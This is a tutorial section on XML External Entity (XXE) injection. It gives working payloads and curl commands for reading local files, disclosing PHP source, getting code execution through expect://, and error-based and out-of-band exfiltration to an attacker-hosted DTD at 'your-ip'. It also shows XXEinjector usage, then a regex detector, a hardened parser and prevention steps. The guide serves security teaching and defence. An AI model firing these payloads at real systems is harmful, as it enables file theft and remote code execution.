3. XML External Entity (XXE) Injection

Introduction to XXE

Definition: XXE vulnerabilities occur when a web application parses user-supplied XML without restricting entity processing, allowing an attacker to inject malicious XML entity declarations that the parser then resolves.

Impact: Can lead to:

  • Sensitive file disclosure (e.g., reading /etc/passwd)

  • Server-side request forgery (SSRF)

  • Denial-of-service (DoS)

  • Remote code execution (RCE)

OWASP Top 10: XXE is considered a significant web security risk; it had its own category (A4) in the 2017 OWASP Top 10 and was folded into A05 Security Misconfiguration in the 2021 edition.


XML Basics

XML Structure:

  • XML documents consist of elements, attributes, entities, and declarations.

  • DTD (Document Type Definition): Defines the structure of an XML document; it can be declared inline (internal subset) or loaded from an external file.

  • XML Entities: Named placeholders, declared in the DTD, that the parser expands wherever they are referenced. They can be internal (value given inline) or external (value loaded from a URI).

  • External entities use a SYSTEM (or PUBLIC) identifier and can reference local files or remote URLs; this resolution step is what XXE abuses.


Exploitation Techniques

1. Local File Disclosure

Identification: Look for web pages that accept XML input.

Exploitation: Define external entities to reference local files.

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>&xxe;</root>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><root>&xxe;</root>' http://target.com/vulnerable.php

2. Source Code Disclosure (PHP Filter)

The php:// stream wrapper only exists when the XML parser runs inside PHP; the base64 filter keeps the PHP source (which contains < and ?) from breaking the XML document.

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<root>&xxe;</root>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]><root>&xxe;</root>' http://target.com/vulnerable.php

3. Remote Code Execution (RCE) with Expect

This requires PHP's expect extension (PECL), which is not installed by default; without it the expect:// wrapper is unknown and the parser simply errors.

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "expect://id"> ]>
<root>&xxe;</root>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "expect://id"> ]><root>&xxe;</root>' http://target.com/vulnerable.php

4. CDATA Exfiltration via External DTD

Wrapping the file in a CDATA section lets the parser return files that contain characters such as < or & that would otherwise break the XML. Because the XML specification forbids referencing parameter entities inside an entity value in the internal subset, the entity that joins the three parts has to live in an external DTD.

Create xxe.dtd:

<!ENTITY joined "%begin;%file;%end;">

Host the DTD file:

python3 -m http.server 8000

Send the XML payload:

<!DOCTYPE root [ <!ENTITY % begin "<![CDATA["> <!ENTITY % file SYSTEM "file:///var/www/html/file.txt"> <!ENTITY % end "]]>"> <!ENTITY % xxe SYSTEM "http://your-ip:8000/xxe.dtd"> %xxe; ]>
<root>&joined;</root>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % begin "<![CDATA["> <!ENTITY % file SYSTEM "file:///var/www/html/file.txt"> <!ENTITY % end "]]>"> <!ENTITY % xxe SYSTEM "http://your-ip:8000/xxe.dtd"> %xxe; ]><root>&joined;</root>' http://target.com/vulnerable.php

5. Error-Based XXE with External DTD

Useful when the application returns XML parser errors: the file contents end up inside a path that does not exist, and the error message echoes that path back.

Create xxe.dtd:

<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

Host the DTD file:

python3 -m http.server 8000

Send the XML payload:

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-ip:8000/xxe.dtd"> %remote; %error; ]>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-ip:8000/xxe.dtd"> %remote; %error; ]>' http://target.com/vulnerable.php

6. Out-of-Band (OOB) Exfiltration with External DTD

Use this when the response shows neither the entity value nor parser errors: the parser itself makes an HTTP request to your server with the base64-encoded file in the content parameter.

Create xxe.dtd:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://your-ip:8000/?content=%file;'>">

Host a web server to receive the callback (PHP's built-in server is used here):

php -S 0.0.0.0:8000

Send the XML payload:

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-ip:8000/xxe.dtd"> %remote; %oob; ]>
<root>&content;</root>

7. Automated XXE Exploitation with XXEinjector

Clone the tool:

git clone https://github.com/enjoiz/XXEinjector.git

Create request.txt:

POST /vulnerable.php HTTP/1.1
...headers...
<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT

Run the exploit:

ruby XXEinjector.rb --host=your-ip --httpport=8000 --file=request.txt --path=/etc/passwd --oob=http --phpfilter

Set up listeners:

nc -lvp 8000

Capture DNS requests:

tcpdump -i tun0 port 53
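The payloads in techniques 1 to 7 above share a handful of textual markers: a DOCTYPE, ENTITY declarations, parameter entities, file:///, php:// or expect:// wrappers, and a remote DTD URL. The following Python is an added detection example for the defender side, not part of the original notes or of XXEinjector: it scans request bodies for those markers and assigns a rough severity. The indicator names, the severity buckets and the sample bodies are this example's own constructions.

```python
import re

# Regexes over the raw request body. Indicator names and patterns are
# constructed for this example; tune them to your parser and traffic.
XXE_INDICATORS = {
    "doctype-declared":   re.compile(r"<!DOCTYPE\b", re.I),
    "external-dtd":       re.compile(r"<!DOCTYPE\s+[\w.:-]+\s+(SYSTEM|PUBLIC)\b", re.I),
    "general-entity":     re.compile(r"<!ENTITY\s+[A-Za-z_][\w.:-]*\s", re.I),
    "parameter-entity":   re.compile(r"<!ENTITY\s+%", re.I),
    "external-entity":    re.compile(r"<!ENTITY[^>]*\b(SYSTEM|PUBLIC)\b", re.I),
    "remote-dtd-fetch":   re.compile(r"<!ENTITY\s+%\s*[\w.:-]+\s+SYSTEM\s+[\"']https?://", re.I),
    "file-scheme":        re.compile(r"\bfile:///", re.I),
    "php-stream-wrapper": re.compile(r"\b(php|expect)://", re.I),
}

# Severity buckets: a remote DTD fetch or a dangerous URI scheme is the clearest
# sign of an active attempt; any entity declaration (even an internal one, which
# can be used for expansion DoS) is worth a ticket; a bare DOCTYPE is noise-level.
HIGH = {"remote-dtd-fetch", "file-scheme", "php-stream-wrapper"}
MEDIUM = {"external-entity", "parameter-entity", "general-entity", "external-dtd"}


def xxe_indicators(body: str) -> list:
    """Return the names of every indicator that matches the request body."""
    return [name for name, rx in XXE_INDICATORS.items() if rx.search(body)]


def xxe_severity(body: str) -> str:
    """Collapse the indicator hits into none / low / medium / high."""
    hits = set(xxe_indicators(body))
    if hits & HIGH:
        return "high"
    if hits & MEDIUM:
        return "medium"
    return "low" if hits else "none"


def triage(bodies: dict) -> dict:
    """Map each body name to (severity, sorted indicators) for an alert summary."""
    return {name: (xxe_severity(b), sorted(xxe_indicators(b))) for name, b in bodies.items()}


# Constructed sample request bodies (the host attacker.example is a placeholder).
SAMPLE_BODIES = {
    "benign": '<?xml version="1.0"?><order><item>widget</item><qty>2</qty></order>',
    "local-file": ('<?xml version="1.0"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
                   '<root>&xxe;</root>'),
    "oob-dtd": ('<?xml version="1.0"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM '
                '"http://attacker.example:8000/xxe.dtd"> %remote; %oob; ]><root>&content;</root>'),
    "internal-only": '<!DOCTYPE r [ <!ELEMENT r (#PCDATA)> ]><r>hello</r>',
}

if __name__ == "__main__":
    for name, (severity, hits) in triage(SAMPLE_BODIES).items():
        print(f"{name:14s} {severity:6s} {hits}")
```

Run it where the body is actually available (WAF, reverse proxy, or the application's own logging of rejected requests). Pair it with outbound-connection monitoring from the application server: an external-DTD or OOB attempt also shows up as the server itself fetching a DTD from an unfamiliar host, which is the signal the nc and tcpdump listeners above are catching from the attacker's side.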

XXE Prevention

  1. Disable DTDs: Configure XML parsers to refuse DTD processing entirely; where a DTD is genuinely required, at least disable external entity and external DTD resolution.

  2. Input Validation: Validate XML input against the schema the application expects and reject documents that carry a DOCTYPE.

  3. Use Safe Parsing Libraries: Use XML parsers, or library wrappers, whose default settings do not resolve external entities.

  4. Update Components: Keep XML libraries and related components up to date.

  5. Least Privilege: Run applications with minimal privileges so that a successful file read or SSRF reaches as little as possible.

  6. Web Application Firewall (WAF): Implement a WAF to filter malicious XML input as a supporting control, not a replacement for parser hardening.
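Item 1 (disable DTDs) is the control that removes the whole class, and it is worth seeing what it looks like in code. The following Python is an added example, not code from the original notes: it builds on the standard-library expat parser, aborts on any DOCTYPE before an entity can be declared, and refuses external entity resolution as a second line of defence. The function names, the exception class and the sample documents are this example's own (the malicious sample mirrors the technique 1 payload).

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when the XML input carries a DOCTYPE declaration (example's own class)."""


def parse_xml_without_dtd(data: bytes) -> dict:
    """
    Parse `data` with Python's stdlib expat parser and return a flat
    {element_path: text} mapping. Any <!DOCTYPE ...> aborts the parse with
    DTDForbidden before a single entity can be declared; malformed XML
    raises xml.parsers.expat.ExpatError.
    """
    parser = xml.parsers.expat.ParserCreate()
    result: dict = {}
    path: list = []
    buf: list = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # 'Disable DTDs': the DOCTYPE is where internal and external entities
        # are declared, so rejecting it rejects every XXE payload shape.
        raise DTDForbidden(f"DOCTYPE '{name}' rejected: DTD processing is disabled")

    def on_external_entity(context, base, system_id, public_id):
        # Second line of defence: returning 0 makes expat fail the parse instead
        # of fetching e.g. file:///etc/passwd. Unreachable while on_doctype is set.
        return 0

    def on_start(name, attrs):
        path.append(name)
        buf.clear()

    def on_chars(text):
        buf.append(text)

    def on_end(name):
        result["/".join(path)] = "".join(buf).strip()
        path.pop()
        buf.clear()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end
    parser.Parse(data, True)
    return result


def classify(data: bytes) -> str:
    """Return 'ok', 'dtd-rejected' or 'malformed' so callers and logs can see why input was dropped."""
    try:
        parse_xml_without_dtd(data)
        return "ok"
    except DTDForbidden:
        return "dtd-rejected"
    except xml.parsers.expat.ExpatError:
        return "malformed"


# Constructed sample documents for the demo.
BENIGN_XML = b'<?xml version="1.0"?><order><item>widget</item><qty>2</qty></order>'
XXE_XML = (b'<?xml version="1.0" encoding="UTF-8"?>'
           b'<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
           b'<root>&xxe;</root>')

if __name__ == "__main__":
    print(parse_xml_without_dtd(BENIGN_XML))
    print("XXE sample:", classify(XXE_XML))
```

The rejection happens inside the DOCTYPE callback, so the parser never reaches the entity declaration, let alone the reference; this is why rejecting DOCTYPE outright is simpler to reason about than trying to allow "safe" DTDs. Log the dtd-rejected outcome: legitimate clients almost never send a DOCTYPE, so each rejection is a cheap, low-noise signal for the detection side.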


Key Takeaways

  • Understand XML Entities: Internal vs. external entities.

  • Advanced XXE Attacks: OOB exfiltration, error-based XXE, and parameter entities.

  • Use Automated Tools: XXEinjector helps automate XXE attacks.

  • Always test legally: Conduct security tests only on systems where you have explicit permission.

  • Regular Updates and Fixes: Patch and monitor applications to prevent XXE vulnerabilities.
